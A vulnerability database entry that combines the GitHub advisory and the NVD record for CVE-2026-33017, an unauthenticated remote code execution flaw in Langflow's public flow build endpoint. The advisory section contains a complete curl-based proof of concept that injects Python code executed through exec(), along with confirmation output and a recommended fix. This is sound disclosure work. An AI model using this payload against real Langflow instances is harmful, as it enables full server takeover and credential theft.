    # For public flows, ALWAYS load from database, never from user data
    return await build_graph_from_db(
        flow_id=flow_id,
        session=fresh_session,
        ...
    )

Severity ?

9.8 (Critical)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.3 (Critical)


                  
                    CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L/E:A

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "langflow"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "1.8.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-33017"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-306",
      "CWE-94",
      "CWE-95"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-17T20:05:05Z",
    "nvd_published_at": "2026-03-20T05:16:15Z",
    "severity": "CRITICAL"
  },
  "details": "## Summary\n\nThe `POST /api/v1/build_public_tmp/{flow_id}/flow` endpoint allows building public flows without requiring authentication. When the optional `data` parameter is supplied, the endpoint uses **attacker-controlled flow data** (containing arbitrary Python code in node definitions) instead of the stored flow data from the database. This code is passed to `exec()` with zero sandboxing, resulting in unauthenticated remote code execution.\n\nThis is distinct from CVE-2025-3248, which fixed `/api/v1/validate/code` by adding authentication. The `build_public_tmp` endpoint is **designed** to be unauthenticated (for public flows) but incorrectly accepts attacker-supplied flow data containing arbitrary executable code.\n\n## Affected Code\n\n### Vulnerable Endpoint (No Authentication)\n\n**File:** `src/backend/base/langflow/api/v1/chat.py`, lines 580-657\n\n```python\n@router.post(\"/build_public_tmp/{flow_id}/flow\")\nasync def build_public_tmp(\n    *,\n    flow_id: uuid.UUID,\n    data: Annotated[FlowDataRequest | None, Body(embed=True)] = None,  # ATTACKER CONTROLLED\n    request: Request,\n    # ... NO Depends(get_current_active_user) -- MISSING AUTH ...\n):\n    \"\"\"Build a public flow without requiring authentication.\"\"\"\n    client_id = request.cookies.get(\"client_id\")\n    owner_user, new_flow_id = await verify_public_flow_and_get_user(flow_id=flow_id, client_id=client_id)\n\n    job_id = await start_flow_build(\n        flow_id=new_flow_id,\n        data=data,  # Attacker\u0027s data passed directly to graph builder\n        current_user=owner_user,\n        ...\n    )\n```\n\nCompare with the authenticated build endpoint at line 138, which requires `current_user: CurrentActiveUser`.\n\n### Code Execution Chain\n\nWhen attacker-supplied `data` is provided, it flows through:\n\n1. `start_flow_build(data=attacker_data)` \u2192 `generate_flow_events()` -- `build.py:81`\n2. `create_graph()` \u2192 `build_graph_from_data(payload=data.model_dump())` -- `build.py:298`\n3. `Graph.from_payload(payload)` parses attacker nodes -- `base.py:1168`\n4. `add_nodes_and_edges()` \u2192 `initialize()` \u2192 `_build_graph()` -- `base.py:270,527`\n5. `_instantiate_components_in_vertices()` iterates nodes -- `base.py:1323`\n6. `vertex.instantiate_component()` \u2192 `instantiate_class(vertex)` -- `loading.py:28`\n7. `code = custom_params.pop(\"code\")` extracts attacker code -- `loading.py:43`\n8. `eval_custom_component_code(code)` \u2192 `create_class(code, class_name)` -- `eval.py:9`\n9. `prepare_global_scope(module)` -- `validate.py:323`\n10. `exec(compiled_code, exec_globals)` -- **ARBITRARY CODE EXECUTION** -- `validate.py:397`\n\n### Unsandboxed exec() in prepare_global_scope\n\n**File:** `src/lfx/src/lfx/custom/validate.py`, lines 340-397\n\n```python\ndef prepare_global_scope(module):\n    exec_globals = globals().copy()\n\n    # Imports are resolved first (any module can be imported)\n    for node in imports:\n        module_obj = importlib.import_module(module_name)  # line 352\n        exec_globals[variable_name] = module_obj\n\n    # Then ALL top-level definitions are executed (Assign, ClassDef, FunctionDef)\n    if definitions:\n        combined_module = ast.Module(body=definitions, type_ignores=[])\n        compiled_code = compile(combined_module, \"\u003cstring\u003e\", \"exec\")\n        exec(compiled_code, exec_globals)  # line 397 - ARBITRARY CODE EXECUTION\n```\n\n**Critical detail:** `prepare_global_scope` executes `ast.Assign` nodes. An attacker\u0027s code like `_x = os.system(\"id\")` is an assignment and will be executed during graph building -- before the flow even \"runs.\"\n\n## Prerequisites\n\n1. Target Langflow instance has at least **one public flow** (common for demos, chatbots, shared workflows)\n2. Attacker knows the public flow\u0027s UUID (discoverable via shared links/URLs)\n3. No authentication required -- only a `client_id` cookie (any arbitrary string value)\n\nWhen `AUTO_LOGIN=true` (the **default**), all prerequisites can be met by an unauthenticated attacker:\n1. `GET /api/v1/auto_login` \u2192 obtain superuser token\n2. `POST /api/v1/flows/` \u2192 create a public flow\n3. Exploit via `build_public_tmp` without any auth\n\n## Proof of Concept\n\n### Tested Against\n\n- **Langflow version 1.7.3** (latest stable release, installed via `pip install langflow`)\n- **Fully reproducible**: 6/6 runs confirmed RCE (two sets of 3 runs each)\n\n### Step 1: Obtain a Public Flow ID\n\n(In a real attack, the attacker discovers this via shared links. For the PoC, we create one via AUTO_LOGIN.)\n\n```bash\n# Get superuser token (no credentials needed when AUTO_LOGIN=true)\nTOKEN=$(curl -s http://localhost:7860/api/v1/auto_login | jq -r \u0027.access_token\u0027)\n\n# Create a public flow\nFLOW_ID=$(curl -s -X POST http://localhost:7860/api/v1/flows/ \\\n  -H \"Authorization: Bearer $TOKEN\" \\\n  -H \"Content-Type: application/json\" \\\n  -d \u0027{\"name\":\"test\",\"data\":{\"nodes\":[],\"edges\":[]},\"access_type\":\"PUBLIC\"}\u0027 \\\n  | jq -r \u0027.id\u0027)\n\necho \"Public Flow ID: $FLOW_ID\"\n```\n\n### Step 2: Exploit -- Unauthenticated RCE\n\n```bash\n# EXPLOIT: Send malicious flow data to the UNAUTHENTICATED endpoint\n# NO Authorization header, NO API key, NO credentials\ncurl -X POST \"http://localhost:7860/api/v1/build_public_tmp/${FLOW_ID}/flow\" \\\n  -H \"Content-Type: application/json\" \\\n  -b \"client_id=attacker\" \\\n  -d \u0027{\n    \"data\": {\n      \"nodes\": [{\n        \"id\": \"Exploit-001\",\n        \"type\": \"genericNode\",\n        \"position\": {\"x\":0,\"y\":0},\n        \"data\": {\n          \"id\": \"Exploit-001\",\n          \"type\": \"ExploitComp\",\n          \"node\": {\n            \"template\": {\n              \"code\": {\n                \"type\": \"code\",\n                \"required\": true,\n                \"show\": true,\n                \"multiline\": true,\n                \"value\": \"import os, socket, json as _json\\n\\n_proof = os.popen(\\\"id\\\").read().strip()\\n_host = socket.gethostname()\\n_write = open(\\\"/tmp/rce-proof\\\",\\\"w\\\").write(f\\\"{_proof} on {_host}\\\")\\n\\nfrom lfx.custom.custom_component.component import Component\\nfrom lfx.io import Output\\nfrom lfx.schema.data import Data\\n\\nclass ExploitComp(Component):\\n    display_name=\\\"X\\\"\\n    outputs=[Output(display_name=\\\"O\\\",name=\\\"o\\\",method=\\\"r\\\")]\\n    def r(self)-\u003eData:\\n        return Data(data={})\",\n                \"name\": \"code\",\n                \"password\": false,\n                \"advanced\": false,\n                \"dynamic\": false\n              },\n              \"_type\": \"Component\"\n            },\n            \"description\": \"X\",\n            \"base_classes\": [\"Data\"],\n            \"display_name\": \"ExploitComp\",\n            \"name\": \"ExploitComp\",\n            \"frozen\": false,\n            \"outputs\": [{\"types\":[\"Data\"],\"selected\":\"Data\",\"name\":\"o\",\"display_name\":\"O\",\"method\":\"r\",\"value\":\"__UNDEFINED__\",\"cache\":true,\"allows_loop\":false,\"tool_mode\":false,\"hidden\":null,\"required_inputs\":null,\"group_outputs\":false}],\n            \"field_order\": [\"code\"],\n            \"beta\": false,\n            \"edited\": false\n          }\n        }\n      }],\n      \"edges\": []\n    },\n    \"inputs\": null\n  }\u0027\n```\n\n### Step 3: Verify Code Execution\n\n```bash\n# Wait 2 seconds for async graph building\nsleep 2\n\n# Check proof file written by attacker\u0027s code on the server\ncat /tmp/rce-proof\n# Output: uid=1000(aviral) gid=1000(aviral) groups=... on kali\n```\n\n### Actual Test Results\n\n```\n======================================================================\nLANGFLOW v1.7.3 UNAUTHENTICATED RCE - DEFINITIVE E2E TEST\n======================================================================\nVersion:  Langflow 1.7.3\n\nRUN 1: POST /api/v1/build_public_tmp/{id}/flow (NO AUTH)\n  HTTP 200 - Job ID: d8db19bf-a532-4f9d-a368-9c46d6235c19\n  *** REMOTE CODE EXECUTION CONFIRMED ***\n    canary: RCE-f0d19b36\n    hostname: kali\n    uid: 1000\n    whoami: aviral\n    id: uid=1000(aviral) gid=1000(aviral) groups=1000(aviral),...\n    uname: Linux 6.16.8+kali-amd64\n\nRUN 2: POST /api/v1/build_public_tmp/{id}/flow (NO AUTH)\n  HTTP 200 - Job ID: d2e24f20-d707-4278-868c-583dd7532832\n  *** REMOTE CODE EXECUTION CONFIRMED ***\n    canary: RCE-6037a271\n\nRUN 3: POST /api/v1/build_public_tmp/{id}/flow (NO AUTH)\n  HTTP 200 - Job ID: 5962244a-42af-4ef6-b134-a6a4adba5ab7\n  *** REMOTE CODE EXECUTION CONFIRMED ***\n    canary: RCE-4a796556\n\nFINAL RESULTS\n  Total checks:   15\n  VULNERABLE:     15\n  SAFE:           0\n  RCE confirmed:  3/3 runs\n  Reproducible:   YES (100%)\n```\n\n## Impact\n\n- **Unauthenticated Remote Code Execution** with full server process privileges\n- **Complete server compromise**: arbitrary file read/write, command execution\n- **Environment variable exfiltration**: API keys, database credentials, cloud tokens (confirmed in PoC: env_keys exfiltrated)\n- **Reverse shell access** for persistent access\n- **Lateral movement** within the network\n- **Data exfiltration** from all flows, messages, and stored credentials in the database\n\n## Comparison with CVE-2025-3248\n\n| Aspect | CVE-2025-3248 | This Vulnerability |\n|--------|--------------|-------------------|\n| **Endpoint** | `/api/v1/validate/code` | `/api/v1/build_public_tmp/{id}/flow` |\n| **Fix applied** | Added `Depends(get_current_active_user)` | None -- NEW vulnerability |\n| **Root cause** | Missing auth on code validation | Unauthenticated endpoint accepts attacker-controlled executable code via `data` param |\n| **Code execution via** | `validate_code()` \u2192 `exec()` | `create_class()` \u2192 `prepare_global_scope()` \u2192 `exec()` |\n| **CISA KEV** | Yes (actively exploited) | N/A (new finding) |\n| **Can simple auth fix?** | Yes (and it was fixed) | No -- endpoint is *designed* to be unauthenticated; the `data` parameter must be removed |\n\n## Recommended Fix\n\n### Immediate (Short-term)\n\n**Remove the `data` parameter** from `build_public_tmp`. Public flows should only execute their stored flow data, never attacker-supplied data:\n\n```python\n@router.post(\"/build_public_tmp/{flow_id}/flow\")\nasync def build_public_tmp(\n    *,\n    flow_id: uuid.UUID,\n    inputs: Annotated[InputValueRequest | None, Body(embed=True)] = None,\n    # REMOVED: data parameter -- public flows must use stored data only\n    ...\n):\n```\n\nIn `generate_flow_events` \u2192 `create_graph()`, only the `build_graph_from_db` path should be reachable for unauthenticated requests:\n\n```python\nasync def create_graph(fresh_session, flow_id_str, flow_name):\n    # For public flows, ALWAYS load from database, never from user data\n    return await build_graph_from_db(\n        flow_id=flow_id,\n        session=fresh_session,\n        ...\n    )\n```",
  "id": "GHSA-vwmf-pq79-vjvx",
  "modified": "2026-03-26T15:41:23Z",
  "published": "2026-03-17T20:05:05Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/langflow-ai/langflow/security/advisories/GHSA-vwmf-pq79-vjvx"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33017"
    },
    {
      "type": "WEB",
      "url": "https://github.com/langflow-ai/langflow/issues/12345"
    },
    {
      "type": "WEB",
      "url": "https://github.com/langflow-ai/langflow/pull/12160"
    },
    {
      "type": "WEB",
      "url": "https://github.com/langflow-ai/langflow/commit/73b6612e3ef25fdae0a752d75b0fabd47328d4f0"
    },
    {
      "type": "ADVISORY",
      "url": "https://github.com/advisories/GHSA-rvqx-wpfh-mfx7"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/langflow-ai/langflow"
    },
    {
      "type": "WEB",
      "url": "https://github.com/langflow-ai/langflow/releases/tag/1.8.2"
    },
    {
      "type": "WEB",
      "url": "https://medium.com/@aviral23/cve-2026-33017-how-i-found-an-unauthenticated-rce-in-langflow-by-reading-the-code-they-already-dc96cdce5896"
    },
    {
      "type": "WEB",
      "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-33017"
    },
    {
      "type": "WEB",
      "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-33017"
    },
    {
      "type": "WEB",
      "url": "https://www.sysdig.com/blog/cve-2026-33017-how-attackers-compromised-langflow-ai-pipelines-in-20-hours"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L/E:A",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Unauthenticated Remote Code Execution in Langflow via Public Flow Build Endpoint"
}

FKIE_CVE-2026-33017

Vulnerability from fkie_nvd - Published: 2026-03-20 05:16 - Updated: 2026-03-26 13:26

CISA KEV

Severity ?

9.8 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Summary

References

URL	Tags
security-advisories@github.com	https://github.com/advisories/GHSA-rvqx-wpfh-mfx7	Third Party Advisory
security-advisories@github.com	https://github.com/langflow-ai/langflow/commit/73b6612e3ef25fdae0a752d75b0fabd47328d4f0	Patch
security-advisories@github.com	https://github.com/langflow-ai/langflow/security/advisories/GHSA-vwmf-pq79-vjvx	Exploit, Mitigation, Vendor Advisory
134c704f-9b21-4f2e-91b3-4a467353bcc0	https://github.com/langflow-ai/langflow/releases/tag/1.8.2	Release Notes
134c704f-9b21-4f2e-91b3-4a467353bcc0	https://medium.com/@aviral23/cve-2026-33017-how-i-found-an-unauthenticated-rce-in-langflow-by-reading-the-code-they-already-dc96cdce5896	Exploit, Third Party Advisory
134c704f-9b21-4f2e-91b3-4a467353bcc0	https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-33017	US Government Resource
134c704f-9b21-4f2e-91b3-4a467353bcc0	https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-33017	US Government Resource
134c704f-9b21-4f2e-91b3-4a467353bcc0	https://www.sysdig.com/blog/cve-2026-33017-how-attackers-compromised-langflow-ai-pipelines-in-20-hours	Press/Media Coverage

Impacted products

	Vendor	Product	Version
	langflow	langflow	*

JSON

To clipboard

{
  "cisaActionDue": "2026-04-08",
  "cisaExploitAdd": "2026-03-25",
  "cisaRequiredAction": "Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.",
  "cisaVulnerabilityName": "Langflow Code Injection Vulnerability",
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:langflow:langflow:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "B38E7511-B77D-4E5F-B33A-458EE5770358",
              "versionEndExcluding": "1.8.2",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Langflow is a tool for building and deploying AI-powered agents and workflows. In versions prior to 1.9.0, the POST /api/v1/build_public_tmp/{flow_id}/flow endpoint allows building public flows without requiring authentication. When the optional data parameter is supplied, the endpoint uses attacker-controlled flow data (containing arbitrary Python code in node definitions) instead of the stored flow data from the database. This code is passed to exec() with zero sandboxing, resulting in unauthenticated remote code execution. This is distinct from CVE-2025-3248, which fixed /api/v1/validate/code by adding authentication. The build_public_tmp endpoint is designed to be unauthenticated (for public flows) but incorrectly accepts attacker-supplied flow data containing arbitrary executable code. This issue has been fixed in version 1.9.0."
    },
    {
      "lang": "es",
      "value": "Langflow es una herramienta para construir y desplegar agentes y flujos de trabajo impulsados por IA. En versiones anteriores a la 1.9.0, el endpoint POST /api/v1/build_public_tmp/{flow_id}/flow permite construir flujos p\u00fablicos sin requerir autenticaci\u00f3n. Cuando se suministra el par\u00e1metro opcional data, el endpoint utiliza datos de flujo controlados por el atacante (que contienen c\u00f3digo Python arbitrario en las definiciones de nodos) en lugar de los datos de flujo almacenados en la base de datos. Este c\u00f3digo se pasa a exec() sin ning\u00fan sandboxing, lo que resulta en una ejecuci\u00f3n remota de c\u00f3digo no autenticada. Esto es distinto de CVE-2025-3248, que corrigi\u00f3 /api/v1/validate/code a\u00f1adiendo autenticaci\u00f3n. El endpoint build_public_tmp est\u00e1 dise\u00f1ado para no requerir autenticaci\u00f3n (para flujos p\u00fablicos) pero acepta incorrectamente datos de flujo suministrados por el atacante que contienen c\u00f3digo ejecutable arbitrario. Este problema ha sido solucionado en la versi\u00f3n 1.9.0."
    }
  ],
  "id": "CVE-2026-33017",
  "lastModified": "2026-03-26T13:26:16.393",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 9.8,
          "baseSeverity": "CRITICAL",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 5.9,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ],
    "cvssMetricV40": [
      {
        "cvssData": {
          "Automatable": "NOT_DEFINED",
          "Recovery": "NOT_DEFINED",
          "Safety": "NOT_DEFINED",
          "attackComplexity": "LOW",
          "attackRequirements": "NONE",
          "attackVector": "NETWORK",
          "availabilityRequirement": "NOT_DEFINED",
          "baseScore": 9.3,
          "baseSeverity": "CRITICAL",
          "confidentialityRequirement": "NOT_DEFINED",
          "exploitMaturity": "NOT_DEFINED",
          "integrityRequirement": "NOT_DEFINED",
          "modifiedAttackComplexity": "NOT_DEFINED",
          "modifiedAttackRequirements": "NOT_DEFINED",
          "modifiedAttackVector": "NOT_DEFINED",
          "modifiedPrivilegesRequired": "NOT_DEFINED",
          "modifiedSubAvailabilityImpact": "NOT_DEFINED",
          "modifiedSubConfidentialityImpact": "NOT_DEFINED",
          "modifiedSubIntegrityImpact": "NOT_DEFINED",
          "modifiedUserInteraction": "NOT_DEFINED",
          "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
          "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
          "modifiedVulnIntegrityImpact": "NOT_DEFINED",
          "privilegesRequired": "NONE",
          "providerUrgency": "NOT_DEFINED",
          "subAvailabilityImpact": "LOW",
          "subConfidentialityImpact": "LOW",
          "subIntegrityImpact": "LOW",
          "userInteraction": "NONE",
          "valueDensity": "NOT_DEFINED",
          "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
          "version": "4.0",
          "vulnAvailabilityImpact": "HIGH",
          "vulnConfidentialityImpact": "HIGH",
          "vulnIntegrityImpact": "HIGH",
          "vulnerabilityResponseEffort": "NOT_DEFINED"
        },
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-03-20T05:16:15.550",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "https://github.com/advisories/GHSA-rvqx-wpfh-mfx7"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/langflow-ai/langflow/commit/73b6612e3ef25fdae0a752d75b0fabd47328d4f0"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Mitigation",
        "Vendor Advisory"
      ],
      "url": "https://github.com/langflow-ai/langflow/security/advisories/GHSA-vwmf-pq79-vjvx"
    },
    {
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "tags": [
        "Release Notes"
      ],
      "url": "https://github.com/langflow-ai/langflow/releases/tag/1.8.2"
    },
    {
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "tags": [
        "Exploit",
        "Third Party Advisory"
      ],
      "url": "https://medium.com/@aviral23/cve-2026-33017-how-i-found-an-unauthenticated-rce-in-langflow-by-reading-the-code-they-already-dc96cdce5896"
    },
    {
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "tags": [
        "US Government Resource"
      ],
      "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-33017"
    },
    {
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "tags": [
        "US Government Resource"
      ],
      "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-33017"
    },
    {
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "tags": [
        "Press/Media Coverage"
      ],
      "url": "https://www.sysdig.com/blog/cve-2026-33017-how-attackers-compromised-langflow-ai-pipelines-in-20-hours"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-94"
        },
        {
          "lang": "en",
          "value": "CWE-95"
        },
        {
          "lang": "en",
          "value": "CWE-306"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-33017 (GCVE-0-2026-33017)

CISA KEV

Known Exploited Vulnerability - GCVE BCP-07 Compliant

Timestamps

Scope

Evidence

Vendor Report Successful Exploitation Confidence: 80% Source: cisa-kev

Details

References

GHSA-VWMF-PQ79-VJVX

Summary

Affected Code

Vulnerable Endpoint (No Authentication)

Code Execution Chain

Unsandboxed exec() in prepare_global_scope

Prerequisites

Proof of Concept

Tested Against

Step 1: Obtain a Public Flow ID

Step 2: Exploit -- Unauthenticated RCE

Step 3: Verify Code Execution

Actual Test Results

Impact

Comparison with CVE-2025-3248

Recommended Fix

Immediate (Short-term)

FKIE_CVE-2026-33017

Tags

Sightings

Nomenclature